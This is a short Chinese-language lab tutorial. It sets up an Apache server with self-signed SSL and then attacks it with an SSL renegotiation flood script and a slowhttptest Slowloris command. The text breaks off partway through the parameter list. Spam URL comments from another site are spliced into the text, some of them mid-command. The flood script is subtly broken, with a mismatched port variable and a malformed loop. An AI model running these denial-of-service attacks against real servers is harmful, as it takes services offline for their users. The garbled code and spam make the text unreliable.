1|00x01 环境
包含3台主机
attact 作为攻击方,使用Centos7.2,安装slowhttptest
server 作为被攻击服务器,安装有apached
windows,用于访问//代码效果参考:http://www.zidongmutanji.com/zsjx/396183.html
server的http及https服务,查看攻击效果2|00x02 准备
1|01.登录server,安装apached
yum -y install httpd
systemctl start httpd
1|02.登录server,配置ssl
使用openssl生成密钥
openssl genrsa -out server.key 2048
openssl req -new -key server.key -out server.csr
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt
cp server.crt /etc/pki/tls/certs/
cp server.key /etc/pki/tls/private/
配置apached server
安装apache ssl模块
yum install mod_ssl openssl
修改配置文件,使用我们刚才生成的的证书
vi /etc/httpd/conf.d/ssl.conf
SSLCertificateFile /etc/pki/tls/certs/server.crt
SSLCertificateKeyFile /etc/pki/tls/private/server.key
修改后,重启apached服务
systemctl restart httpd
1|03.登录attact,安装slowhttptest
yum //代码效果参考:http://www.zidongmutanji.com/bxxx/255398.html
-y install slowhttptest查看帮助
slowhttptest -help
3|00x03 步骤
1|0一、发起SSL慢速攻击
登录attact计算机
shell脚本 ,修改target ip
#!/bin/bash
target=192.168.164.136 # //代码效果参考:http://www.zidongmutanji.com/bxxx/496416.html
IPport=443
parallel=100
thc-ssl-dosit()
{
while :;
do
(while :; do echo R; done) | openssl s_client -connect $target:$port 2>/dev/null;
done
}
for x in seq 1 $parallel;
do
thc-ssl-dosit
done
给脚本加上权限
chmod 777 ssl.sh
运行脚本,运行后观察CPU使用率。
./ssl.sh
停止脚本
pgrep ssl.sh | xargs kill -s 9
1|0二、Slowloris攻击
注意修改目标IP
slowhttptest -c 1000 -H -g -i 10 -r 200 -t GET -u -x 24 -p 3
参数说明
-c target number of connections
-H
